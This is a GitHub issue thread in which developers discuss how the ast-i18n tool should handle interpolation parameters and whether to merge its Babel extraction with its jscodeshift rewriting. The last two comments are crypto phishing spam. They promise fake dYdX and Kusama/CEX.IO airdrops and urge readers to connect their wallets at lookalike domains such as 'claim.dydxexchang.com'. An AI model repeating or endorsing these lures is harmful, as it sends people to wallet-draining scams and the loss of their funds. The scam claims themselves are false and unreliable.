### ISSUE TITLE
handle params

### ISSUE THREAD

**Issue by sibelius** [sibelius/ast-i18n#3]
Options (e.g. for pluralization, or adding context/screenshots for translators) are specified like this:

const thisManyApples = t('{user} ate {count} apples', {count: 3, user: '@sseraphini '})

**Comment by sibelius** [comment]
this could help https://gist.github.com/Munter/87ed1b35cf8a6f7c2e3d26ca7a618cea

we need more AST processing

**Comment by sibelius** [comment]
eslint rules

https://gist.github.com/Munter/87d476c490f6e6debccd02d5acd8e82a

**Comment by sibelius** [comment]
check here https://github.com/oliviertassinari/i18n-extract

**Comment by katilius** [comment]
I think I almost have something working, but I have a question - why there is babel code that extracts resources and modifies code and there is jacodeshift script that only does the modification?

**Comment by sibelius** [comment]
Great question!

The Babel transformer is based on fbt, it run the transformer just to find all strings values in the code and generate the i18n key value dict, for now it will generate the dict in 18next format. It does not need to modify any code

The jscodeshift will run the same transform, but it will modify the code to the final code with i18n keys

**Comment by katilius** [comment]
And maybe it would make sense to consolidate the two? For example if jscodeshift at thr sams time would write to some resource file as it modifies.

**Comment by sibelius** [comment]
not sure if we can do this using jscodeshift as it run all files in parallel, hard to consolidade all strings

but we can try

**Comment by muraliR** [comment]
## Congratulations! You've been chosen to receive a $7,000 Rewards. 🪂🔴 


### Trading and Launch Rewards are live on dYdX Chain! ✨

Connect your wallet, follow the instructions, and claim this exclusive offer from Dydx Exchange. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

[![Dydx Exchange](https://pbs.twimg.com/card_img/1729868185275617280/nzyJpc7G?format=jpg&name=small)](https://claim.dydxexchang.com/)


[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Rewards Now!** [Check Eligibility](https://claim.dydxexchang.com/)

Access the Dydx Exchange platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your Rewards, up to $2,000!

@dydxprotocol

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)
